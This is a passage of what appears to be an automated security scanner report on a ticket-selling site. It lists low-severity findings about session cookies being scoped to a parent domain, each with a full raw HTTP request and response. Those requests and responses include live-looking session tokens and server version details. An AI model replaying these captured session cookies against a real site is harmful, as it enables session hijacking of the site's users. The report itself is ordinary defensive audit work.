Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4B2dJOHBjoLb2Zmc2V0af6QnQ%3D%3D--8a1ac49a36095f4dbcf7a97d829c4d094b2f91ed

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:34:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
Cache-Control: no-cache
X-Runtime: 5
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4CKjxeKBjoLb2Zmc2V0af6QnQ%3D%3D--84e3834079e7b25bf0922de612ae40f39c83b91e; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 1
Connection: close
Content-Type: text/html; charset=utf-8


13.9. http://bing.fansnap.com/seats/ajax/get_row_data  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://bing.fansnap.com
Path:   /seats/ajax/get_row_data

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /seats/ajax/get_row_data?event_ids[]=389669&use_ids=true&abppc=false&bfl=true&ps=false&ugc_enabled=true&exclude_brokers=629&map_type=interactive&get_geom=true&get_row=false HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DD%2F96GBjoLb2Zmc2V0af6QnQ%3D%3D--887aa4237234bb536971e58d8deef758bed09b0b

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:33:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 1267
ETag: "b1257b01a53ef99693d765e3a17f07e5"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4D5MReHBjoLb2Zmc2V0af6QnQ%3D%3D--bd9b40f18e2d6dc1d8e22c6446686fa9fe2c928f; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 148442
Connection: close
Content-Type: application/json; charset=utf-8

{"row_data":[{"attr":{"priceRange":{"min":220,"max":220},"salePriceRange":{"min":200,"max":200},"compCnt":1,"tixSetCnt":1,"qty":2,"sum":220,"sectionList":{"keys":{"89193":1}}},"markableData":{"geomId"
...[SNIP]...

13.10. http://bing.fansnap.com/seats/ajax/get_summary_data  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://bing.fansnap.com
Path:   /seats/ajax/get_summary_data

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /seats/ajax/get_summary_data?event_ids[]=389669&use_ids=true&abppc=false&bfl=true&ps=false&ugc_enabled=true&exclude_brokers=629&map_type=interactive&get_geom=true&get_row=false HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DoLqSGBjoLb2Zmc2V0af6QnQ%3D%3D--ba45fc2687ffe9128b4ed829643a0bb02de5bef2

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:33:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 1207
ETag: "53dbe6041c02cd63a984397ab8771445"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4BdD%2FWGBjoLb2Zmc2V0af6QnQ%3D%3D--79d72df7e350a03720c4d1b91fdb01c069f1fe55; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 64893
Connection: close
Content-Type: application/json; charset=utf-8

{"area_data":{"venue":{"attr":{"compCnt":424,"tixSetCnt":1306,"qty":3573}},"areas":[{"attr":{"priceRange":{"min":50,"max":825},"salePriceRange":{"min":50,"max":750},"compCnt":322,"tixSetCnt":556,"qty"
...[SNIP]...

13.11. http://bing.fansnap.com/seats/ajax/get_tickets_data  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://bing.fansnap.com
Path:   /seats/ajax/get_tickets_data

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /seats/ajax/get_tickets_data?ch=bing&order=salePrice&dir=asc&perpage=75&page=1&event_ids[]=389669&base_price=true&ugc_enabled=true&exclude_brokers=629&mrkrs=true& HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DoLqSGBjoLb2Zmc2V0af6QnQ%3D%3D--ba45fc2687ffe9128b4ed829643a0bb02de5bef2

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:33:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 506
ETag: "70bf5bf8b3c509089f4acd0e0252f004"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DI8uSGBjoLb2Zmc2V0af6QnQ%3D%3D--dc840df0a17875b9fb6b0de95b7e98800627c2f7; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 61856
Connection: close
Content-Type: application/json; charset=utf-8

{"sets":[{"attr":{"key2":"f5b8116b2e","areaName":"Concourse 3 345","sectionName":"Concourse 3 345","rowName":"11","aId":6420,"sId":89301,"rId":1285632,"split":"2","eventId":389669,"qty":2,"tixSetCnt":
...[SNIP]...

13.12. http://bing.fansnap.com/seats/ajax/get_vfs_data  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://bing.fansnap.com
Path:   /seats/ajax/get_vfs_data

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /seats/ajax/get_vfs_data?vid=6119&ch=bing&cat=21600 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DoLqSGBjoLb2Zmc2V0af6QnQ%3D%3D--ba45fc2687ffe9128b4ed829643a0bb02de5bef2

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:33:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 9
ETag: "99914b932bd37a50b983c5e7c90ae93b"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4Df7saGBjoLb2Zmc2V0af6QnQ%3D%3D--615873154c6872e1f19a93062453dfc3552c4bd5; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 2
Connection: close
Content-Type: application/json; charset=utf-8

{}

13.13. http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://bing.fansnap.com
Path:   /u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/events/search?q=U2+with+Interpol+(rescheduled+from+7%2f19)&p1=[Events%20source=%22vertical%22+qzeventid=%22f389669%22]&FORM=DTPEVE
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
